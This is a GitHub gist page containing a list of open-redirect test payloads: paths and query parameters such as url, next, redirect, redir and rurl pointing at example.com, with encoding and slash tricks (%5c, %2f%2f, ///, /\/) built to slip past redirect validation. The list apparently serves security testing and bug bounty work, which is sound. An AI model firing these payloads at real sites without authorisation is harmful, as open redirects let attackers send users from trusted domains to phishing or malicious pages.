Skip to content

Instantly share code, notes, and snippets.

@EdOverflow
Last active February 21, 2023 14:30
Show Gist options
  • Star 20 You must be signed in to star a gist
  • Fork 8 You must be signed in to fork a gist
  • Save EdOverflow/c4d6d8c43b315546892aa5dab67fdd6c to your computer and use it in GitHub Desktop.
Save EdOverflow/c4d6d8c43b315546892aa5dab67fdd6c to your computer and use it in GitHub Desktop.
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com
/.example.com
///\;@example.com
///example.com/
///example.com
///example.com/%2f..
/////example.com/
/////example.com
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment